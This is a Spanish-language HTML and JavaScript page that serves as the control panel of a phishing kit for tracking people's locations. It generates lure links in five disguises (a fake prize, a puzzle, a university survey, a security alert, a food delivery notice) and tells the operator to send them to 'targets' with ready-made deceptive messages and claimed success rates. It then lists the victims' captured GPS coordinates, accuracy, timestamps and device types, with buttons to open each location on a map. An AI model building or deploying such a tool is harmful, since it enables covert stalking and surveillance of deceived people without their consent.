<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>🕵️‍♂️ Centro de Control - Espionaje</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Courier New', monospace;
            background: linear-gradient(135deg, #2c3e50, #34495e);
            color: #ecf0f1;
            min-height: 100vh;
            padding: 20px;
        }
        
        .container {
            max-width: 1000px;
            margin: 0 auto;
        }
        
        .header {
            text-align: center;
            margin-bottom: 30px;
            padding: 20px;
            background: rgba(0,0,0,0.3);
            border-radius: 15px;
            border: 2px solid #27ae60;
        }
        
        .header h1 {
            font-size: 2.5rem;
            color: #27ae60;
            margin-bottom: 10px;
            text-shadow: 0 0 10px #27ae60;
        }
        
        .section {
            background: rgba(0,0,0,0.4);
            border-radius: 15px;
            padding: 25px;
            margin-bottom: 20px;
            border-left: 4px solid #3498db;
        }
        
        .section h2 {
            color: #3498db;
            margin-bottom: 20px;
            font-size: 1.5rem;
        }
        
        .link-item {
            background: rgba(255,255,255,0.1);
            padding: 15px;
            border-radius: 10px;
            margin-bottom: 15px;
            border: 1px solid rgba(255,255,255,0.2);
            transition: all 0.3s ease;
        }
        
        .link-item:hover {
            background: rgba(255,255,255,0.2);
            transform: translateX(5px);
        }
        
        .link-title {
            color: #f39c12;
            font-weight: bold;
            margin-bottom: 8px;
            font-size: 1.1rem;
        }
        
        .link-url {
            background: #2c3e50;
            padding: 10px;
            border-radius: 5px;
            font-family: monospace;
            word-break: break-all;
            margin: 10px 0;
            cursor: pointer;
            border: 1px solid #34495e;
        }
        
        .link-url:hover {
            background: #34495e;
        }
        
        .copy-btn {
            background: #27ae60;
            color: white;
            border: none;
            padding: 8px 15px;
            border-radius: 5px;
            cursor: pointer;
            margin-right: 10px;
            font-size: 0.9rem;
            transition: background 0.3s ease;
        }
        
        .copy-btn:hover {
            background: #229954;
        }
        
        .test-btn {
            background: #3498db;
            color: white;
            border: none;
            padding: 8px 15px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 0.9rem;
            transition: background 0.3s ease;
        }
        
        .test-btn:hover {
            background: #2980b9;
        }
        
        .stats {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
            gap: 15px;
            margin-bottom: 20px;
        }
        
        .stat-item {
            background: rgba(0,0,0,0.5);
            padding: 20px;
            border-radius: 10px;
            text-align: center;
            border: 1px solid rgba(255,255,255,0.1);
        }
        
        .stat-number {
            font-size: 2rem;
            color: #e74c3c;
            font-weight: bold;
        }
        
        .stat-label {
            color: #bdc3c7;
            margin-top: 5px;
        }
        
        .captured-locations {
            max-height: 400px;
            overflow-y: auto;
            background: rgba(0,0,0,0.3);
            padding: 15px;
            border-radius: 10px;
            border: 1px solid rgba(255,255,255,0.1);
        }
        
        .location-item {
            background: rgba(255,255,255,0.1);
            padding: 15px;
            border-radius: 8px;
            margin-bottom: 10px;
            border-left: 4px solid #e74c3c;
        }
        
        .location-header {
            color: #e74c3c;
            font-weight: bold;
            margin-bottom: 8px;
        }
        
        .location-details {
            font-size: 0.9rem;
            color: #bdc3c7;
            line-height: 1.4;
        }
        
        .refresh-btn {
            background: #e74c3c;
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 8px;
            cursor: pointer;
            font-size: 1rem;
            margin-bottom: 20px;
            transition: background 0.3s ease;
        }
        
        .refresh-btn:hover {
            background: #c0392b;
        }
        
        .notification {
            position: fixed;
            top: 20px;
            right: 20px;
            background: #27ae60;
            color: white;
            padding: 15px 20px;
            border-radius: 8px;
            box-shadow: 0 4px 12px rgba(0,0,0,0.3);
            z-index: 10000;
            opacity: 0;
            transform: translateX(100%);
            transition: all 0.3s ease;
        }
        
        .notification.show {
            opacity: 1;
            transform: translateX(0);
        }
        
        @keyframes blink {
            0%, 50% { opacity: 1; }
            51%, 100% { opacity: 0.3; }
        }
        
        .live-indicator {
            color: #e74c3c;
            animation: blink 1s infinite;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1>🕵️‍♂️ CENTRO DE CONTROL</h1>
            <p>Sistema de Espionaje de Ubicaciones - <span class="live-indicator">● EN VIVO</span></p>
        </div>
        
        <div class="section">
            <h2>📊 ESTADÍSTICAS EN TIEMPO REAL</h2>
            <div class="stats">
                <div class="stat-item">
                    <div class="stat-number" id="totalCaptures">0</div>
                    <div class="stat-label">Ubicaciones Capturadas</div>
                </div>
                <div class="stat-item">
                    <div class="stat-number" id="todayCaptures">0</div>
                    <div class="stat-label">Capturas Hoy</div>
                </div>
                <div class="stat-item">
                    <div class="stat-number" id="averageAccuracy">0m</div>
                    <div class="stat-label">Precisión Promedio</div>
                </div>
                <div class="stat-item">
                    <div class="stat-number" id="bestStrategy">-</div>
                    <div class="stat-label">Mejor Estrategia</div>
                </div>
            </div>
        </div>
        
        <div class="section">
            <h2>🎯 ENLACES PARA COMPARTIR</h2>
            <p style="margin-bottom: 20px; color: #bdc3c7;">Copia estos enlaces y envíalos a tus objetivos:</p>
            
            <div class="link-item">
                <div class="link-title">🎁 ESTRATEGIA PREMIO (Efectividad: 90%)</div>
                <div class="link-url" onclick="copyToClipboard(this.textContent)" id="prizeLink">Cargando...</div>
                <button class="copy-btn" onclick="copyToClipboard(document.getElementById('prizeLink').textContent)">📋 Copiar</button>
                <button class="test-btn" onclick="testLink('prize')">🧪 Probar</button>
                <p style="color: #95a5a6; font-size: 0.9rem; margin-top: 8px;">Mensaje sugerido: "¡Oye! ¿Viste esto? Parece que ganaste algo increíble"</p>
            </div>
            
            <div class="link-item">
                <div class="link-title">🎮 ESTRATEGIA JUEGO (Efectividad: 85%)</div>
                <div class="link-url" onclick="copyToClipboard(this.textContent)" id="gameLink">Cargando...</div>
                <button class="copy-btn" onclick="copyToClipboard(document.getElementById('gameLink').textContent)">📋 Copiar</button>
                <button class="test-btn" onclick="testLink('game')">🧪 Probar</button>
                <p style="color: #95a5a6; font-size: 0.9rem; margin-top: 8px;">Mensaje sugerido: "Encontré este acertijo súper raro... ¿puedes resolverlo?"</p>
            </div>
            
            <div class="link-item">
                <div class="link-title">📊 ESTRATEGIA ENCUESTA (Efectividad: 80%)</div>
                <div class="link-url" onclick="copyToClipboard(this.textContent)" id="surveyLink">Cargando...</div>
                <button class="copy-btn" onclick="copyToClipboard(document.getElementById('surveyLink').textContent)">📋 Copiar</button>
                <button class="test-btn" onclick="testLink('survey')">🧪 Probar</button>
                <p style="color: #95a5a6; font-size: 0.9rem; margin-top: 8px;">Mensaje sugerido: "Me pidieron compartir esta encuesta de la universidad. ¿Te toma 1 minuto?"</p>
            </div>
            
            <div class="link-item">
                <div class="link-title">⚠️ ESTRATEGIA SEGURIDAD (Efectividad: 95%)</div>
                <div class="link-url" onclick="copyToClipboard(this.textContent)" id="securityLink">Cargando...</div>
                <button class="copy-btn" onclick="copyToClipboard(document.getElementById('securityLink').textContent)">📋 Copiar</button>
                <button class="test-btn" onclick="testLink('security')">🧪 Probar</button>
                <p style="color: #95a5a6; font-size: 0.9rem; margin-top: 8px;">Mensaje sugerido: "¡Cuidado! Recibí esta alerta de seguridad extraña. ¿A ti te llegó?"</p>
            </div>
            
            <div class="link-item">
                <div class="link-title">🍕 ESTRATEGIA DELIVERY (Efectividad: 75%)</div>
                <div class="link-url" onclick="copyToClipboard(this.textContent)" id="deliveryLink">Cargando...</div>
                <button class="copy-btn" onclick="copyToClipboard(document.getElementById('deliveryLink').textContent)">📋 Copiar</button>
                <button class="test-btn" onclick="testLink('delivery')">🧪 Probar</button>
                <p style="color: #95a5a6; font-size: 0.9rem; margin-top: 8px;">Mensaje sugerido: "¿Pediste comida? Me llegó esta notificación rara con tu nombre"</p>
            </div>
        </div>
        
        <div class="section">
            <h2>📍 UBICACIONES CAPTURADAS</h2>
            <button class="refresh-btn" onclick="refreshCaptures()">🔄 Actualizar</button>
            <div class="captured-locations" id="capturedList">
                <p style="color: #95a5a6; text-align: center; padding: 20px;">No hay capturas aún... ¡Envía los enlaces!</p>
            </div>
        </div>
    </div>
    
    <div class="notification" id="notification"></div>
    
    <script>
        // Variables globales
        let baseUrl = '';
        
        // Inicializar
        document.addEventListener('DOMContentLoaded', function() {
            detectBaseUrl();
            updateStats();
            refreshCaptures();
            
            // Auto-refresh cada 10 segundos
            setInterval(() => {
                updateStats();
                refreshCaptures();
            }, 10000);
        });
        
        // Detectar URL base
        function detectBaseUrl() {
            baseUrl = window.location.origin;
            
            // Actualizar enlaces
            document.getElementById('prizeLink').textContent = `${baseUrl}/stealth.html?mode=prize`;
            document.getElementById('gameLink').textContent = `${baseUrl}/stealth.html?mode=game`;
            document.getElementById('surveyLink').textContent = `${baseUrl}/stealth.html?mode=survey`;
            document.getElementById('securityLink').textContent = `${baseUrl}/stealth.html?mode=security`;
            document.getElementById('deliveryLink').textContent = `${baseUrl}/stealth.html?mode=delivery`;
        }
        
        // Copiar al portapapeles
        function copyToClipboard(text) {
            navigator.clipboard.writeText(text).then(() => {
                showNotification('✅ Enlace copiado al portapapeles');
            }).catch(() => {
                // Fallback
                const textArea = document.createElement('textarea');
                textArea.value = text;
                document.body.appendChild(textArea);
                textArea.select();
                document.execCommand('copy');
                document.body.removeChild(textArea);
                showNotification('✅ Enlace copiado');
            });
        }
        
        // Probar enlace
        function testLink(mode) {
            const url = `${baseUrl}/stealth.html?mode=${mode}`;
            window.open(url, '_blank');
        }
        
        // Mostrar notificación
        function showNotification(message) {
            const notification = document.getElementById('notification');
            notification.textContent = message;
            notification.classList.add('show');
            
            setTimeout(() => {
                notification.classList.remove('show');
            }, 3000);
        }
        
        // Actualizar estadísticas
        function updateStats() {
            const capturedLocations = JSON.parse(localStorage.getItem('capturedLocations') || '[]');
            
            // Total capturas
            document.getElementById('totalCaptures').textContent = capturedLocations.length;
            
            // Capturas hoy
            const today = new Date().toDateString();
            const todayCaptures = capturedLocations.filter(loc => 
                new Date(loc.timestamp).toDateString() === today
            ).length;
            document.getElementById('todayCaptures').textContent = todayCaptures;
            
            // Precisión promedio
            if (capturedLocations.length > 0) {
                const avgAccuracy = capturedLocations.reduce((sum, loc) => sum + loc.accuracy, 0) / capturedLocations.length;
                document.getElementById('averageAccuracy').textContent = Math.round(avgAccuracy) + 'm';
            }
            
            // Mejor estrategia
            const strategies = {};
            capturedLocations.forEach(loc => {
                strategies[loc.source] = (strategies[loc.source] || 0) + 1;
            });
            
            const bestStrategy = Object.keys(strategies).reduce((a, b) => 
                strategies[a] > strategies[b] ? a : b, '-'
            );
            
            const shortName = {
                'Premio iPhone 15 Pro': '🎁 Premio',
                'Resolver Acertijo': '🎮 Juego',
                'Estudio Académico': '📊 Encuesta',
                'Verificación de Seguridad': '⚠️ Seguridad',
                'Confirmación de Entrega': '🍕 Delivery'
            };
            
            document.getElementById('bestStrategy').textContent = shortName[bestStrategy] || '-';
        }
        
        // Refrescar capturas
        function refreshCaptures() {
            const capturedLocations = JSON.parse(localStorage.getItem('capturedLocations') || '[]');
            const container = document.getElementById('capturedList');
            
            if (capturedLocations.length === 0) {
                container.innerHTML = '<p style="color: #95a5a6; text-align: center; padding: 20px;">No hay capturas aún... ¡Envía los enlaces!</p>';
                return;
            }
            
            container.innerHTML = capturedLocations.map(location => `
                <div class="location-item">
                    <div class="location-header">🎯 ${location.source}</div>
                    <div class="location-details">
                        📍 <strong>Coordenadas:</strong> ${location.lat.toFixed(6)}, ${location.lng.toFixed(6)}<br>
                        🎯 <strong>Precisión:</strong> ±${Math.round(location.accuracy)}m<br>
                        ⏰ <strong>Capturado:</strong> ${new Date(location.timestamp).toLocaleString()}<br>
                        🌐 <strong>Dispositivo:</strong> ${location.userAgent.includes('Mobile') ? '📱 Móvil' : '💻 PC'}
                        <div style="margin-top: 10px;">
                            <button onclick="openInGoogleMaps(${location.lat}, ${location.lng})" style="background: #3498db; color: white; border: none; padding: 5px 10px; border-radius: 3px; cursor: pointer; margin-right: 5px; font-size: 0.8rem;">
                                🗺️ Ver en Mapa
                            </button>
                            <button onclick="copyToClipboard('${location.lat.toFixed(6)}, ${location.lng.toFixed(6)}')" style="background: #27ae60; color: white; border: none; padding: 5px 10px; border-radius: 3px; cursor: pointer; font-size: 0.8rem;">
                                📋 Copiar Coordenadas
                            </button>
                        </div>
                    </div>
                </div>
            `).join('');
        }
        
        // Abrir en Google Maps
        function openInGoogleMaps(lat, lng) {
            const url = `https://www.google.com/maps?q=${lat},${lng}`;
            window.open(url, '_blank');
        }
    </script>
</body>
</html>